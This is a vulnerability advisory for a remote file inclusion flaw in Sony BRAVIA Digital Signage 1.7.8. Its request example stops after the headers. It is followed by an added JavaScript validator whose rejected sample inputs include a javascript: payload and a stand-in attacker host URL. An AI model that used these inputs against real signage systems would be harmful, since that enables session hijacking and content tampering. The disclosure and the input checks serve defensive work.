# Exploit Title: Sony BRAVIA Digital Signage 1.7.8 - Unauthenticated Remote File Inclusion
# Date: 20.09.2020
# Exploit Author: LiquidWorm
# Vendor Homepage:
# Version: 1.7.8

Sony BRAVIA Digital Signage 1.7.8 Unauthenticated Remote File Inclusion

Vendor: Sony Electronics Inc.
Product web page:
Affected version: <=1.7.8

Summary: Sony's BRAVIA Signage is an application to deliver
video and still images to Pro BRAVIAs and manage the information
via a network. Features include management of displays, power
schedule management, content playlists, scheduled delivery
management, content interrupt, and more. This cost-effective
digital signage management solution is ideal for presenting
attractive, informative visual content in retail spaces and
hotel reception areas, visitor attractions, educational and
corporate environments.

Desc: BRAVIA digital signage is vulnerable to a remote file
inclusion (RFI) vulnerability that allows including arbitrary
client-side dynamic scripts (JavaScript, VBScript, HTML) when adding
content through the URL material input of type html. This allows
hijacking the current session of the user, executing cross-site
scripting code, or changing the look of the page and content modification on current

Tested on: Microsoft Windows Server 2012 R2

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

Advisory ID: ZSL-2020-5612
Advisory URL:

POST /api/content-creation?type=create&id=174ace2f9371b4 HTTP/1.1
Proxy-Connection: keep-alive
Content-Length: 468
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36
Content-Type: application/json;charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: io=RslVZVH6Dc8WsOn5AAAJ
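A server-side input check for the content-creation request shown above, as an added example that is not Sony's code: it rejects material URLs whose scheme is not http/https (so javascript:, vbscript: and data: URLs never reach the renderer) and whose host is not on an operator allowlist. The JSON field names (materialType, materialUrl), the allowlisted host and the sample bodies are assumptions constructed for the example.

```javascript
// Added example (not Sony's code): validation of the URL supplied as material
// on the content-creation endpoint. Field names (materialType, materialUrl)
// and the host allowlist are assumptions.
const ALLOWED_SCHEMES = new Set(["http:", "https:"]);
// Assumed operator-maintained list of hosts permitted to serve material.
const ALLOWED_HOSTS = new Set(["signage-content.example.internal"]);

function validateMaterialUrl(raw, allowedHosts = ALLOWED_HOSTS) {
  if (typeof raw !== "string" || raw.length === 0 || raw.length > 2048) {
    return { ok: false, reason: "missing-or-oversized" };
  }
  // URL parsers silently strip control characters and whitespace; reject them
  // up front so the stored value is exactly the string that was checked.
  if (/[\u0000-\u001f\u007f\s]/.test(raw)) {
    return { ok: false, reason: "control-chars" };
  }
  let url;
  try {
    url = new URL(raw); // WHATWG parser; lowercases scheme and host
  } catch {
    return { ok: false, reason: "unparseable" };
  }
  // Blocks javascript:, vbscript:, data:, file: and any other non-HTTP scheme.
  if (!ALLOWED_SCHEMES.has(url.protocol)) {
    return { ok: false, reason: "scheme-not-allowed:" + url.protocol };
  }
  if (url.username !== "" || url.password !== "") {
    return { ok: false, reason: "credentials-in-url" };
  }
  if (!allowedHosts.has(url.hostname)) {
    return { ok: false, reason: "host-not-allowlisted:" + url.hostname };
  }
  return { ok: true, url: url.href };
}

// Check a parsed JSON body of a content-creation request (assumed shape).
// Applied to every material type, not only html: the check is cheap.
function checkContentCreationBody(body) {
  if (!body || typeof body !== "object") return { ok: false, reason: "no-body" };
  return validateMaterialUrl(body.materialUrl);
}

// Constructed sample bodies: one legitimate, three that must be rejected.
const SAMPLES = [
  { materialType: "html", materialUrl: "https://signage-content.example.internal/lobby.html" },
  { materialType: "html", materialUrl: "JavaScript:alert(1)" },
  { materialType: "html", materialUrl: "data:text/html,hello" },
  { materialType: "html", materialUrl: "https://attacker.example/x.html" },
];
```

Allowlisting the source host limits who can supply material; rendering HTML material in a sandboxed frame on a separate origin is the complementary control that limits what accepted material can do to the management session.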